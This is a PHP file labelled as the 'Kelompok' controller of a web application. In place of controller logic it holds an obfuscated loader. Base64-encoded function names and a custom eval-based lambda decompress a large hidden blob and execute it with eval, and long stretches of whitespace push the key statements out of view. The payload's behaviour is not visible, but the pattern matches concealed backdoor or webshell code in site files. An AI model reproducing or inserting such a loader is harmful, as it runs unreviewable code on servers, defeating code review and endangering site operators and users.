<?php 
        $__='printf';$_='Loading donjo-app/controllers/Kelompok.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
